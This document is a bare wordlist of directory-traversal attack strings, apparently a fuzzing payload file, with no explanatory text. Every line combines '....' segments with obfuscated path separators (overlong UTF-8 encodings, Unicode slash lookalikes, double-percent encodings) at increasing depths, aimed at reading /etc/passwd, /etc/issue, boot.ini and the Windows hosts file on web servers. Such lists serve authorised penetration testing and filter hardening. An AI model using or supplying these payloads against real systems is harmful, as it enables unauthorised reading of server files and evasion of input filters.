-..../%c1%9c..../%c1%9c..../%c1%9cboot.ini -..../%c1%9c..../%c1%9c..../%c1%9cwindows%c1%9csystem32%c1%9cdrivers%c1%9cetc%c1%9chosts -..../%c1%9c..../%c1%9c..../%c1%9c..../%c1%9cetc%c1%9cpasswd -..../%c1%9c..../%c1%9c..../%c1%9c..../%c1%9cetc%c1%9cissue -..../%c1%9c..../%c1%9c..../%c1%9c..../%c1%9cboot.ini -..../%c1%9c..../%c1%9c..../%c1%9c..../%c1%9cwindows%c1%9csystem32%c1%9cdrivers%c1%9cetc%c1%9chosts -..../%c1%9c..../%c1%9c..../%c1%9c..../%c1%9c..../%c1%9cetc%c1%9cpasswd -..../%c1%9c..../%c1%9c..../%c1%9c..../%c1%9c..../%c1%9cetc%c1%9cissue -..../%c1%9c..../%c1%9c..../%c1%9c..../%c1%9c..../%c1%9cboot.ini -..../%c1%9c..../%c1%9c..../%c1%9c..../%c1%9c..../%c1%9cwindows%c1%9csystem32%c1%9cdrivers%c1%9cetc%c1%9chosts -..../%c1%9c..../%c1%9c..../%c1%9c..../%c1%9c..../%c1%9c..../%c1%9cetc%c1%9cpasswd -..../%c1%9c..../%c1%9c..../%c1%9c..../%c1%9c..../%c1%9c..../%c1%9cetc%c1%9cissue -..../%c1%9c..../%c1%9c..../%c1%9c..../%c1%9c..../%c1%9c..../%c1%9cboot.ini -..../%c1%9c..../%c1%9c..../%c1%9c..../%c1%9c..../%c1%9c..../%c1%9cwindows%c1%9csystem32%c1%9cdrivers%c1%9cetc%c1%9chosts -..../%c1%pcetc%c1%pcpasswd -..../%c1%pcetc%c1%pcissue -..../%c1%pcboot.ini -..../%c1%pcwindows%c1%pcsystem32%c1%pcdrivers%c1%pcetc%c1%pchosts -..../%c1%pc..../%c1%pcetc%c1%pcpasswd -..../%c1%pc..../%c1%pcetc%c1%pcissue -..../%c1%pc..../%c1%pcboot.ini -..../%c1%pc..../%c1%pcwindows%c1%pcsystem32%c1%pcdrivers%c1%pcetc%c1%pchosts -..../%c1%pc..../%c1%pc..../%c1%pcetc%c1%pcpasswd -..../%c1%pc..../%c1%pc..../%c1%pcetc%c1%pcissue -..../%c1%pc..../%c1%pc..../%c1%pcboot.ini -..../%c1%pc..../%c1%pc..../%c1%pcwindows%c1%pcsystem32%c1%pcdrivers%c1%pcetc%c1%pchosts -..../%c1%pc..../%c1%pc..../%c1%pc..../%c1%pcetc%c1%pcpasswd -..../%c1%pc..../%c1%pc..../%c1%pc..../%c1%pcetc%c1%pcissue -..../%c1%pc..../%c1%pc..../%c1%pc..../%c1%pcboot.ini -..../%c1%pc..../%c1%pc..../%c1%pc..../%c1%pcwindows%c1%pcsystem32%c1%pcdrivers%c1%pcetc%c1%pchosts -..../%c1%pc..../%c1%pc..../%c1%pc..../%c1%pc..../%c1%pcetc%c1%pcpasswd -..../%c1%pc..../%c1%pc..../%c1%pc..../%c1%pc..../%c1%pcetc%c1%pcissue -..../%c1%pc..../%c1%pc..../%c1%pc..../%c1%pc..../%c1%pcboot.ini -..../%c1%pc..../%c1%pc..../%c1%pc..../%c1%pc..../%c1%pcwindows%c1%pcsystem32%c1%pcdrivers%c1%pcetc%c1%pchosts -..../%c1%pc..../%c1%pc..../%c1%pc..../%c1%pc..../%c1%pc..../%c1%pcetc%c1%pcpasswd -..../%c1%pc..../%c1%pc..../%c1%pc..../%c1%pc..../%c1%pc..../%c1%pcetc%c1%pcissue -..../%c1%pc..../%c1%pc..../%c1%pc..../%c1%pc..../%c1%pc..../%c1%pcboot.ini -..../%c1%pc..../%c1%pc..../%c1%pc..../%c1%pc..../%c1%pc..../%c1%pcwindows%c1%pcsystem32%c1%pcdrivers%c1%pcetc%c1%pchosts -..../%c0%9vetc%c0%9vpasswd -..../%c0%9vetc%c0%9vissue -..../%c0%9vboot.ini -..../%c0%9vwindows%c0%9vsystem32%c0%9vdrivers%c0%9vetc%c0%9vhosts -..../%c0%9v..../%c0%9vetc%c0%9vpasswd -..../%c0%9v..../%c0%9vetc%c0%9vissue -..../%c0%9v..../%c0%9vboot.ini -..../%c0%9v..../%c0%9vwindows%c0%9vsystem32%c0%9vdrivers%c0%9vetc%c0%9vhosts -..../%c0%9v..../%c0%9v..../%c0%9vetc%c0%9vpasswd -..../%c0%9v..../%c0%9v..../%c0%9vetc%c0%9vissue -..../%c0%9v..../%c0%9v..../%c0%9vboot.ini -..../%c0%9v..../%c0%9v..../%c0%9vwindows%c0%9vsystem32%c0%9vdrivers%c0%9vetc%c0%9vhosts -..../%c0%9v..../%c0%9v..../%c0%9v..../%c0%9vetc%c0%9vpasswd -..../%c0%9v..../%c0%9v..../%c0%9v..../%c0%9vetc%c0%9vissue -..../%c0%9v..../%c0%9v..../%c0%9v..../%c0%9vboot.ini -..../%c0%9v..../%c0%9v..../%c0%9v..../%c0%9vwindows%c0%9vsystem32%c0%9vdrivers%c0%9vetc%c0%9vhosts -..../%c0%9v..../%c0%9v..../%c0%9v..../%c0%9v..../%c0%9vetc%c0%9vpasswd -..../%c0%9v..../%c0%9v..../%c0%9v..../%c0%9v..../%c0%9vetc%c0%9vissue -..../%c0%9v..../%c0%9v..../%c0%9v..../%c0%9v..../%c0%9vboot.ini -..../%c0%9v..../%c0%9v..../%c0%9v..../%c0%9v..../%c0%9vwindows%c0%9vsystem32%c0%9vdrivers%c0%9vetc%c0%9vhosts -..../%c0%9v..../%c0%9v..../%c0%9v..../%c0%9v..../%c0%9v..../%c0%9vetc%c0%9vpasswd -..../%c0%9v..../%c0%9v..../%c0%9v..../%c0%9v..../%c0%9v..../%c0%9vetc%c0%9vissue -..../%c0%9v..../%c0%9v..../%c0%9v..../%c0%9v..../%c0%9v..../%c0%9vboot.ini -..../%c0%9v..../%c0%9v..../%c0%9v..../%c0%9v..../%c0%9v..../%c0%9vwindows%c0%9vsystem32%c0%9vdrivers%c0%9vetc%c0%9vhosts -..../%c0%qfetc%c0%qfpasswd -..../%c0%qfetc%c0%qfissue -..../%c0%qfboot.ini -..../%c0%qfwindows%c0%qfsystem32%c0%qfdrivers%c0%qfetc%c0%qfhosts -..../%c0%qf..../%c0%qfetc%c0%qfpasswd -..../%c0%qf..../%c0%qfetc%c0%qfissue -..../%c0%qf..../%c0%qfboot.ini -..../%c0%qf..../%c0%qfwindows%c0%qfsystem32%c0%qfdrivers%c0%qfetc%c0%qfhosts -..../%c0%qf..../%c0%qf..../%c0%qfetc%c0%qfpasswd -..../%c0%qf..../%c0%qf..../%c0%qfetc%c0%qfissue -..../%c0%qf..../%c0%qf..../%c0%qfboot.ini -..../%c0%qf..../%c0%qf..../%c0%qfwindows%c0%qfsystem32%c0%qfdrivers%c0%qfetc%c0%qfhosts -..../%c0%qf..../%c0%qf..../%c0%qf..../%c0%qfetc%c0%qfpasswd -..../%c0%qf..../%c0%qf..../%c0%qf..../%c0%qfetc%c0%qfissue -..../%c0%qf..../%c0%qf..../%c0%qf..../%c0%qfboot.ini -..../%c0%qf..../%c0%qf..../%c0%qf..../%c0%qfwindows%c0%qfsystem32%c0%qfdrivers%c0%qfetc%c0%qfhosts -..../%c0%qf..../%c0%qf..../%c0%qf..../%c0%qf..../%c0%qfetc%c0%qfpasswd -..../%c0%qf..../%c0%qf..../%c0%qf..../%c0%qf..../%c0%qfetc%c0%qfissue -..../%c0%qf..../%c0%qf..../%c0%qf..../%c0%qf..../%c0%qfboot.ini -..../%c0%qf..../%c0%qf..../%c0%qf..../%c0%qf..../%c0%qfwindows%c0%qfsystem32%c0%qfdrivers%c0%qfetc%c0%qfhosts -..../%c0%qf..../%c0%qf..../%c0%qf..../%c0%qf..../%c0%qf..../%c0%qfetc%c0%qfpasswd -..../%c0%qf..../%c0%qf..../%c0%qf..../%c0%qf..../%c0%qf..../%c0%qfetc%c0%qfissue -..../%c0%qf..../%c0%qf..../%c0%qf..../%c0%qf..../%c0%qf..../%c0%qfboot.ini -..../%c0%qf..../%c0%qf..../%c0%qf..../%c0%qf..../%c0%qf..../%c0%qfwindows%c0%qfsystem32%c0%qfdrivers%c0%qfetc%c0%qfhosts -..../%c1%8setc%c1%8spasswd -..../%c1%8setc%c1%8sissue -..../%c1%8sboot.ini -..../%c1%8swindows%c1%8ssystem32%c1%8sdrivers%c1%8setc%c1%8shosts -..../%c1%8s..../%c1%8setc%c1%8spasswd -..../%c1%8s..../%c1%8setc%c1%8sissue -..../%c1%8s..../%c1%8sboot.ini -..../%c1%8s..../%c1%8swindows%c1%8ssystem32%c1%8sdrivers%c1%8setc%c1%8shosts -..../%c1%8s..../%c1%8s..../%c1%8setc%c1%8spasswd -..../%c1%8s..../%c1%8s..../%c1%8setc%c1%8sissue -..../%c1%8s..../%c1%8s..../%c1%8sboot.ini -..../%c1%8s..../%c1%8s..../%c1%8swindows%c1%8ssystem32%c1%8sdrivers%c1%8setc%c1%8shosts -..../%c1%8s..../%c1%8s..../%c1%8s..../%c1%8setc%c1%8spasswd -..../%c1%8s..../%c1%8s..../%c1%8s..../%c1%8setc%c1%8sissue -..../%c1%8s..../%c1%8s..../%c1%8s..../%c1%8sboot.ini -..../%c1%8s..../%c1%8s..../%c1%8s..../%c1%8swindows%c1%8ssystem32%c1%8sdrivers%c1%8setc%c1%8shosts -..../%c1%8s..../%c1%8s..../%c1%8s..../%c1%8s..../%c1%8setc%c1%8spasswd -..../%c1%8s..../%c1%8s..../%c1%8s..../%c1%8s..../%c1%8setc%c1%8sissue -..../%c1%8s..../%c1%8s..../%c1%8s..../%c1%8s..../%c1%8sboot.ini -..../%c1%8s..../%c1%8s..../%c1%8s..../%c1%8s..../%c1%8swindows%c1%8ssystem32%c1%8sdrivers%c1%8setc%c1%8shosts -..../%c1%8s..../%c1%8s..../%c1%8s..../%c1%8s..../%c1%8s..../%c1%8setc%c1%8spasswd -..../%c1%8s..../%c1%8s..../%c1%8s..../%c1%8s..../%c1%8s..../%c1%8setc%c1%8sissue -..../%c1%8s..../%c1%8s..../%c1%8s..../%c1%8s..../%c1%8s..../%c1%8sboot.ini -..../%c1%8s..../%c1%8s..../%c1%8s..../%c1%8s..../%c1%8s..../%c1%8swindows%c1%8ssystem32%c1%8sdrivers%c1%8setc%c1%8shosts -..../%c1%1cetc%c1%1cpasswd -..../%c1%1cetc%c1%1cissue -..../%c1%1cboot.ini -..../%c1%1cwindows%c1%1csystem32%c1%1cdrivers%c1%1cetc%c1%1chosts -..../%c1%1c..../%c1%1cetc%c1%1cpasswd -..../%c1%1c..../%c1%1cetc%c1%1cissue -..../%c1%1c..../%c1%1cboot.ini -..../%c1%1c..../%c1%1cwindows%c1%1csystem32%c1%1cdrivers%c1%1cetc%c1%1chosts -..../%c1%1c..../%c1%1c..../%c1%1cetc%c1%1cpasswd -..../%c1%1c..../%c1%1c..../%c1%1cetc%c1%1cissue -..../%c1%1c..../%c1%1c..../%c1%1cboot.ini -..../%c1%1c..../%c1%1c..../%c1%1cwindows%c1%1csystem32%c1%1cdrivers%c1%1cetc%c1%1chosts -..../%c1%1c..../%c1%1c..../%c1%1c..../%c1%1cetc%c1%1cpasswd -..../%c1%1c..../%c1%1c..../%c1%1c..../%c1%1cetc%c1%1cissue -..../%c1%1c..../%c1%1c..../%c1%1c..../%c1%1cboot.ini -..../%c1%1c..../%c1%1c..../%c1%1c..../%c1%1cwindows%c1%1csystem32%c1%1cdrivers%c1%1cetc%c1%1chosts -..../%c1%1c..../%c1%1c..../%c1%1c..../%c1%1c..../%c1%1cetc%c1%1cpasswd -..../%c1%1c..../%c1%1c..../%c1%1c..../%c1%1c..../%c1%1cetc%c1%1cissue -..../%c1%1c..../%c1%1c..../%c1%1c..../%c1%1c..../%c1%1cboot.ini -..../%c1%1c..../%c1%1c..../%c1%1c..../%c1%1c..../%c1%1cwindows%c1%1csystem32%c1%1cdrivers%c1%1cetc%c1%1chosts -..../%c1%1c..../%c1%1c..../%c1%1c..../%c1%1c..../%c1%1c..../%c1%1cetc%c1%1cpasswd -..../%c1%1c..../%c1%1c..../%c1%1c..../%c1%1c..../%c1%1c..../%c1%1cetc%c1%1cissue -..../%c1%1c..../%c1%1c..../%c1%1c..../%c1%1c..../%c1%1c..../%c1%1cboot.ini -..../%c1%1c..../%c1%1c..../%c1%1c..../%c1%1c..../%c1%1c..../%c1%1cwindows%c1%1csystem32%c1%1cdrivers%c1%1cetc%c1%1chosts -..../%c1%afetc%c1%afpasswd -..../%c1%afetc%c1%afissue -..../%c1%afboot.ini -..../%c1%afwindows%c1%afsystem32%c1%afdrivers%c1%afetc%c1%afhosts -..../%c1%af..../%c1%afetc%c1%afpasswd -..../%c1%af..../%c1%afetc%c1%afissue -..../%c1%af..../%c1%afboot.ini -..../%c1%af..../%c1%afwindows%c1%afsystem32%c1%afdrivers%c1%afetc%c1%afhosts -..../%c1%af..../%c1%af..../%c1%afetc%c1%afpasswd -..../%c1%af..../%c1%af..../%c1%afetc%c1%afissue -..../%c1%af..../%c1%af..../%c1%afboot.ini -..../%c1%af..../%c1%af..../%c1%afwindows%c1%afsystem32%c1%afdrivers%c1%afetc%c1%afhosts -..../%c1%af..../%c1%af..../%c1%af..../%c1%afetc%c1%afpasswd -..../%c1%af..../%c1%af..../%c1%af..../%c1%afetc%c1%afissue -..../%c1%af..../%c1%af..../%c1%af..../%c1%afboot.ini -..../%c1%af..../%c1%af..../%c1%af..../%c1%afwindows%c1%afsystem32%c1%afdrivers%c1%afetc%c1%afhosts -..../%c1%af..../%c1%af..../%c1%af..../%c1%af..../%c1%afetc%c1%afpasswd -..../%c1%af..../%c1%af..../%c1%af..../%c1%af..../%c1%afetc%c1%afissue -..../%c1%af..../%c1%af..../%c1%af..../%c1%af..../%c1%afboot.ini -..../%c1%af..../%c1%af..../%c1%af..../%c1%af..../%c1%afwindows%c1%afsystem32%c1%afdrivers%c1%afetc%c1%afhosts -..../%c1%af..../%c1%af..../%c1%af..../%c1%af..../%c1%af..../%c1%afetc%c1%afpasswd -..../%c1%af..../%c1%af..../%c1%af..../%c1%af..../%c1%af..../%c1%afetc%c1%afissue -..../%c1%af..../%c1%af..../%c1%af..../%c1%af..../%c1%af..../%c1%afboot.ini -..../%c1%af..../%c1%af..../%c1%af..../%c1%af..../%c1%af..../%c1%afwindows%c1%afsystem32%c1%afdrivers%c1%afetc%c1%afhosts -..../%bg%qfetc%bg%qfpasswd -..../%bg%qfetc%bg%qfissue -..../%bg%qfboot.ini -..../%bg%qfwindows%bg%qfsystem32%bg%qfdrivers%bg%qfetc%bg%qfhosts -..../%bg%qf..../%bg%qfetc%bg%qfpasswd -..../%bg%qf..../%bg%qfetc%bg%qfissue -..../%bg%qf..../%bg%qfboot.ini -..../%bg%qf..../%bg%qfwindows%bg%qfsystem32%bg%qfdrivers%bg%qfetc%bg%qfhosts -..../%bg%qf..../%bg%qf..../%bg%qfetc%bg%qfpasswd -..../%bg%qf..../%bg%qf..../%bg%qfetc%bg%qfissue -..../%bg%qf..../%bg%qf..../%bg%qfboot.ini -..../%bg%qf..../%bg%qf..../%bg%qfwindows%bg%qfsystem32%bg%qfdrivers%bg%qfetc%bg%qfhosts -..../%bg%qf..../%bg%qf..../%bg%qf..../%bg%qfetc%bg%qfpasswd -..../%bg%qf..../%bg%qf..../%bg%qf..../%bg%qfetc%bg%qfissue -..../%bg%qf..../%bg%qf..../%bg%qf..../%bg%qfboot.ini -..../%bg%qf..../%bg%qf..../%bg%qf..../%bg%qfwindows%bg%qfsystem32%bg%qfdrivers%bg%qfetc%bg%qfhosts -..../%bg%qf..../%bg%qf..../%bg%qf..../%bg%qf..../%bg%qfetc%bg%qfpasswd -..../%bg%qf..../%bg%qf..../%bg%qf..../%bg%qf..../%bg%qfetc%bg%qfissue -..../%bg%qf..../%bg%qf..../%bg%qf..../%bg%qf..../%bg%qfboot.ini -..../%bg%qf..../%bg%qf..../%bg%qf..../%bg%qf..../%bg%qfwindows%bg%qfsystem32%bg%qfdrivers%bg%qfetc%bg%qfhosts -..../%bg%qf..../%bg%qf..../%bg%qf..../%bg%qf..../%bg%qf..../%bg%qfetc%bg%qfpasswd -..../%bg%qf..../%bg%qf..../%bg%qf..../%bg%qf..../%bg%qf..../%bg%qfetc%bg%qfissue -..../%bg%qf..../%bg%qf..../%bg%qf..../%bg%qf..../%bg%qf..../%bg%qfboot.ini -..../%bg%qf..../%bg%qf..../%bg%qf..../%bg%qf..../%bg%qf..../%bg%qfwindows%bg%qfsystem32%bg%qfdrivers%bg%qfetc%bg%qfhosts -..../%u2215etc%u2215passwd -..../%u2215etc%u2215issue -..../%u2215boot.ini -..../%u2215windows%u2215system32%u2215drivers%u2215etc%u2215hosts -..../%u2215..../%u2215etc%u2215passwd -..../%u2215..../%u2215etc%u2215issue -..../%u2215..../%u2215boot.ini -..../%u2215..../%u2215windows%u2215system32%u2215drivers%u2215etc%u2215hosts -..../%u2215..../%u2215..../%u2215etc%u2215passwd -..../%u2215..../%u2215..../%u2215etc%u2215issue -..../%u2215..../%u2215..../%u2215boot.ini -..../%u2215..../%u2215..../%u2215windows%u2215system32%u2215drivers%u2215etc%u2215hosts -..../%u2215..../%u2215..../%u2215..../%u2215etc%u2215passwd -..../%u2215..../%u2215..../%u2215..../%u2215etc%u2215issue -..../%u2215..../%u2215..../%u2215..../%u2215boot.ini -..../%u2215..../%u2215..../%u2215..../%u2215windows%u2215system32%u2215drivers%u2215etc%u2215hosts -..../%u2215..../%u2215..../%u2215..../%u2215..../%u2215etc%u2215passwd -..../%u2215..../%u2215..../%u2215..../%u2215..../%u2215etc%u2215issue -..../%u2215..../%u2215..../%u2215..../%u2215..../%u2215boot.ini -..../%u2215..../%u2215..../%u2215..../%u2215..../%u2215windows%u2215system32%u2215drivers%u2215etc%u2215hosts -..../%u2215..../%u2215..../%u2215..../%u2215..../%u2215..../%u2215etc%u2215passwd -..../%u2215..../%u2215..../%u2215..../%u2215..../%u2215..../%u2215etc%u2215issue -..../%u2215..../%u2215..../%u2215..../%u2215..../%u2215..../%u2215boot.ini -..../%u2215..../%u2215..../%u2215..../%u2215..../%u2215..../%u2215windows%u2215system32%u2215drivers%u2215etc%u2215hosts -..../%u2216etc%u2216passwd -..../%u2216etc%u2216issue -..../%u2216boot.ini -..../%u2216windows%u2216system32%u2216drivers%u2216etc%u2216hosts -..../%u2216..../%u2216etc%u2216passwd -..../%u2216..../%u2216etc%u2216issue -..../%u2216..../%u2216boot.ini -..../%u2216..../%u2216windows%u2216system32%u2216drivers%u2216etc%u2216hosts -..../%u2216..../%u2216..../%u2216etc%u2216passwd -..../%u2216..../%u2216..../%u2216etc%u2216issue -..../%u2216..../%u2216..../%u2216boot.ini -..../%u2216..../%u2216..../%u2216windows%u2216system32%u2216drivers%u2216etc%u2216hosts -..../%u2216..../%u2216..../%u2216..../%u2216etc%u2216passwd -..../%u2216..../%u2216..../%u2216..../%u2216etc%u2216issue -..../%u2216..../%u2216..../%u2216..../%u2216boot.ini -..../%u2216..../%u2216..../%u2216..../%u2216windows%u2216system32%u2216drivers%u2216etc%u2216hosts -..../%u2216..../%u2216..../%u2216..../%u2216..../%u2216etc%u2216passwd -..../%u2216..../%u2216..../%u2216..../%u2216..../%u2216etc%u2216issue -..../%u2216..../%u2216..../%u2216..../%u2216..../%u2216boot.ini -..../%u2216..../%u2216..../%u2216..../%u2216..../%u2216windows%u2216system32%u2216drivers%u2216etc%u2216hosts -..../%u2216..../%u2216..../%u2216..../%u2216..../%u2216..../%u2216etc%u2216passwd -..../%u2216..../%u2216..../%u2216..../%u2216..../%u2216..../%u2216etc%u2216issue -..../%u2216..../%u2216..../%u2216..../%u2216..../%u2216..../%u2216boot.ini -..../%u2216..../%u2216..../%u2216..../%u2216..../%u2216..../%u2216windows%u2216system32%u2216drivers%u2216etc%u2216hosts -..../%uEFC8etc%uEFC8passwd -..../%uEFC8etc%uEFC8issue -..../%uEFC8boot.ini -..../%uEFC8windows%uEFC8system32%uEFC8drivers%uEFC8etc%uEFC8hosts -..../%uEFC8..../%uEFC8etc%uEFC8passwd -..../%uEFC8..../%uEFC8etc%uEFC8issue -..../%uEFC8..../%uEFC8boot.ini -..../%uEFC8..../%uEFC8windows%uEFC8system32%uEFC8drivers%uEFC8etc%uEFC8hosts -..../%uEFC8..../%uEFC8..../%uEFC8etc%uEFC8passwd -..../%uEFC8..../%uEFC8..../%uEFC8etc%uEFC8issue -..../%uEFC8..../%uEFC8..../%uEFC8boot.ini -..../%uEFC8..../%uEFC8..../%uEFC8windows%uEFC8system32%uEFC8drivers%uEFC8etc%uEFC8hosts -..../%uEFC8..../%uEFC8..../%uEFC8..../%uEFC8etc%uEFC8passwd -..../%uEFC8..../%uEFC8..../%uEFC8..../%uEFC8etc%uEFC8issue -..../%uEFC8..../%uEFC8..../%uEFC8..../%uEFC8boot.ini -..../%uEFC8..../%uEFC8..../%uEFC8..../%uEFC8windows%uEFC8system32%uEFC8drivers%uEFC8etc%uEFC8hosts -..../%uEFC8..../%uEFC8..../%uEFC8..../%uEFC8..../%uEFC8etc%uEFC8passwd -..../%uEFC8..../%uEFC8..../%uEFC8..../%uEFC8..../%uEFC8etc%uEFC8issue -..../%uEFC8..../%uEFC8..../%uEFC8..../%uEFC8..../%uEFC8boot.ini -..../%uEFC8..../%uEFC8..../%uEFC8..../%uEFC8..../%uEFC8windows%uEFC8system32%uEFC8drivers%uEFC8etc%uEFC8hosts -..../%uEFC8..../%uEFC8..../%uEFC8..../%uEFC8..../%uEFC8..../%uEFC8etc%uEFC8passwd -..../%uEFC8..../%uEFC8..../%uEFC8..../%uEFC8..../%uEFC8..../%uEFC8etc%uEFC8issue -..../%uEFC8..../%uEFC8..../%uEFC8..../%uEFC8..../%uEFC8..../%uEFC8boot.ini -..../%uEFC8..../%uEFC8..../%uEFC8..../%uEFC8..../%uEFC8..../%uEFC8windows%uEFC8system32%uEFC8drivers%uEFC8etc%uEFC8hosts -..../%uF025etc%uF025passwd -..../%uF025etc%uF025issue -..../%uF025boot.ini -..../%uF025windows%uF025system32%uF025drivers%uF025etc%uF025hosts -..../%uF025..../%uF025etc%uF025passwd -..../%uF025..../%uF025etc%uF025issue -..../%uF025..../%uF025boot.ini -..../%uF025..../%uF025windows%uF025system32%uF025drivers%uF025etc%uF025hosts -..../%uF025..../%uF025..../%uF025etc%uF025passwd -..../%uF025..../%uF025..../%uF025etc%uF025issue -..../%uF025..../%uF025..../%uF025boot.ini -..../%uF025..../%uF025..../%uF025windows%uF025system32%uF025drivers%uF025etc%uF025hosts -..../%uF025..../%uF025..../%uF025..../%uF025etc%uF025passwd -..../%uF025..../%uF025..../%uF025..../%uF025etc%uF025issue -..../%uF025..../%uF025..../%uF025..../%uF025boot.ini -..../%uF025..../%uF025..../%uF025..../%uF025windows%uF025system32%uF025drivers%uF025etc%uF025hosts -..../%uF025..../%uF025..../%uF025..../%uF025..../%uF025etc%uF025passwd -..../%uF025..../%uF025..../%uF025..../%uF025..../%uF025etc%uF025issue -..../%uF025..../%uF025..../%uF025..../%uF025..../%uF025boot.ini -..../%uF025..../%uF025..../%uF025..../%uF025..../%uF025windows%uF025system32%uF025drivers%uF025etc%uF025hosts -..../%uF025..../%uF025..../%uF025..../%uF025..../%uF025..../%uF025etc%uF025passwd -..../%uF025..../%uF025..../%uF025..../%uF025..../%uF025..../%uF025etc%uF025issue -..../%uF025..../%uF025..../%uF025..../%uF025..../%uF025..../%uF025boot.ini -..../%uF025..../%uF025..../%uF025..../%uF025..../%uF025..../%uF025windows%uF025system32%uF025drivers%uF025etc%uF025hosts -..../%%32%%66etc%%32%%66passwd -..../%%32%%66etc%%32%%66issue -..../%%32%%66boot.ini -..../%%32%%66windows%%32%%66system32%%32%%66drivers%%32%%66etc%%32%%66hosts -..../%%32%%66..../%%32%%66etc%%32%%66passwd -..../%%32%%66..../%%32%%66etc%%32%%66issue -..../%%32%%66..../%%32%%66boot.ini -..../%%32%%66..../%%32%%66windows%%32%%66system32%%32%%66drivers%%32%%66etc%%32%%66hosts -..../%%32%%66..../%%32%%66..../%%32%%66etc%%32%%66passwd -..../%%32%%66..../%%32%%66..../%%32%%66etc%%32%%66issue -..../%%32%%66..../%%32%%66..../%%32%%66boot.ini -..../%%32%%66..../%%32%%66..../%%32%%66windows%%32%%66system32%%32%%66drivers%%32%%66etc%%32%%66hosts -..../%%32%%66..../%%32%%66..../%%32%%66..../%%32%%66etc%%32%%66passwd -..../%%32%%66..../%%32%%66..../%%32%%66..../%%32%%66etc%%32%%66issue -..../%%32%%66..../%%32%%66..../%%32%%66..../%%32%%66boot.ini -..../%%32%%66..../%%32%%66..../%%32%%66..../%%32%%66windows%%32%%66system32%%32%%66drivers%%32%%66etc%%32%%66hosts -..../%%32%%66..../%%32%%66..../%%32%%66..../%%32%%66..../%%32%%66etc%%32%%66passwd -..../%%32%%66..../%%32%%66..../%%32%%66..../%%32%%66..../%%32%%66etc%%32%%66issue -..../%%32%%66..../%%32%%66..../%%32%%66..../%%32%%66..../%%32%%66boot.ini -..../%%32%%66..../%%32%%66..../%%32%%66..../%%32%%66..../%%32%%66windows%%32%%66system32%%32%%66drivers%%32%%66etc%%32%%66hosts -..../%%32%%66..../%%32%%66..../%%32%%66..../%%32%%66..../%%32%%66..../%%32%%66etc%%32%%66passwd -..../%%32%%66..../%%32%%66..../%%32%%66..../%%32%%66..../%%32%%66..../%%32%%66etc%%32%%66issue -..../%%32%%66..../%%32%%66..../%%32%%66..../%%32%%66..../%%32%%66..../%%32%%66boot.ini -..../%%32%%66..../%%32%%66..../%%32%%66..../%%32%%66..../%%32%%66..../%%32%%66windows%%32%%66system32%%32%%66drivers%%32%%66etc%%32%%66hosts -..../%%35%%63etc%%35%%63passwd -..../%%35%%63etc%%35%%63issue -..../%%35%%63boot.ini -..../%%35%%63windows%%35%%63system32%%35%%63drivers%%35%%63etc%%35%%63hosts -..../%%35%%63..../%%35%%63etc%%35%%63passwd -..../%%35%%63..../%%35%%63etc%%35%%63issue -..../%%35%%63..../%%35%%63boot.ini -..../%%35%%63..../%%35%%63windows%%35%%63system32%%35%%63drivers%%35%%63etc%%35%%63hosts -..../%%35%%63..../%%35%%63..../%%35%%63etc%%35%%63passwd -..../%%35%%63..../%%35%%63..../%%35%%63etc%%35%%63issue -..../%%35%%63..../%%35%%63..../%%35%%63boot.ini -..../%%35%%63..../%%35%%63..../%%35%%63windows%%35%%63system32%%35%%63drivers%%35%%63etc%%35%%63hosts -..../%%35%%63..../%%35%%63..../%%35%%63..../%%35%%63etc%%35%%63passwd -..../%%35%%63..../%%35%%63..../%%35%%63..../%%35%%63etc%%35%%63issue -..../%%35%%63..../%%35%%63..../%%35%%63..../%%35%%63boot.ini -..../%%35%%63..../%%35%%63..../%%35%%63..../%%35%%63windows%%35%%63system32%%35%%63drivers%%35%%63etc%%35%%63hosts -..../%%35%%63..../%%35%%63..../%%35%%63..../%%35%%63..../%%35%%63etc%%35%%63passwd -..../%%35%%63..../%%35%%63..../%%35%%63..../%%35%%63..../%%35%%63etc%%35%%63issue -..../%%35%%63..../%%35%%63..../%%35%%63..../%%35%%63..../%%35%%63boot.ini -..../%%35%%63..../%%35%%63..../%%35%%63..../%%35%%63..../%%35%%63windows%%35%%63system32%%35%%63drivers%%35%%63etc%%35%%63hosts -..../%%35%%63..../%%35%%63..../%%35%%63..../%%35%%63..../%%35%%63..../%%35%%63etc%%35%%63passwd -..../%%35%%63..../%%35%%63..../%%35%%63..../%%35%%63..../%%35%%63..../%%35%%63etc%%35%%63issue -..../%%35%%63..../%%35%%63..../%%35%%63..../%%35%%63..../%%35%%63..../%%35%%63boot.ini -..../%%35%%63..../%%35%%63..../%%35%%63..../%%35%%63..../%%35%%63..../%%35%%63windows%%35%%63system32%%35%%63drivers%%35%%63etc%%35%%63hosts -..../%e0%80%afetc%e0%80%afpasswd -..../%e0%80%afetc%e0%80%afissue -..../%e0%80%afboot.ini -..../%e0%80%afwindows%e0%80%afsystem32%e0%80%afdrivers%e0%80%afetc%e0%80%afhosts -..../%e0%80%af..../%e0%80%afetc%e0%80%afpasswd -..../%e0%80%af..../%e0%80%afetc%e0%80%afissue -..../%e0%80%af..../%e0%80%afboot.ini -..../%e0%80%af..../%e0%80%afwindows%e0%80%afsystem32%e0%80%afdrivers%e0%80%afetc%e0%80%afhosts -..../%e0%80%af..../%e0%80%af..../%e0%80%afetc%e0%80%afpasswd -..../%e0%80%af..../%e0%80%af..../%e0%80%afetc%e0%80%afissue -..../%e0%80%af..../%e0%80%af..../%e0%80%afboot.ini -..../%e0%80%af..../%e0%80%af..../%e0%80%afwindows%e0%80%afsystem32%e0%80%afdrivers%e0%80%afetc%e0%80%afhosts -..../%e0%80%af..../%e0%80%af..../%e0%80%af..../%e0%80%afetc%e0%80%afpasswd -..../%e0%80%af..../%e0%80%af..../%e0%80%af..../%e0%80%afetc%e0%80%afissue -..../%e0%80%af..../%e0%80%af..../%e0%80%af..../%e0%80%afboot.ini -..../%e0%80%af..../%e0%80%af..../%e0%80%af..../%e0%80%afwindows%e0%80%afsystem32%e0%80%afdrivers%e0%80%afetc%e0%80%afhosts -..../%e0%80%af..../%e0%80%af..../%e0%80%af..../%e0%80%af..../%e0%80%afetc%e0%80%afpasswd -..../%e0%80%af..../%e0%80%af..../%e0%80%af..../%e0%80%af..../%e0%80%afetc%e0%80%afissue -..../%e0%80%af..../%e0%80%af..../%e0%80%af..../%e0%80%af..../%e0%80%afboot.ini -..../%e0%80%af..../%e0%80%af..../%e0%80%af..../%e0%80%af..../%e0%80%afwindows%e0%80%afsystem32%e0%80%afdrivers%e0%80%afetc%e0%80%afhosts -..../%e0%80%af..../%e0%80%af..../%e0%80%af..../%e0%80%af..../%e0%80%af..../%e0%80%afetc%e0%80%afpasswd 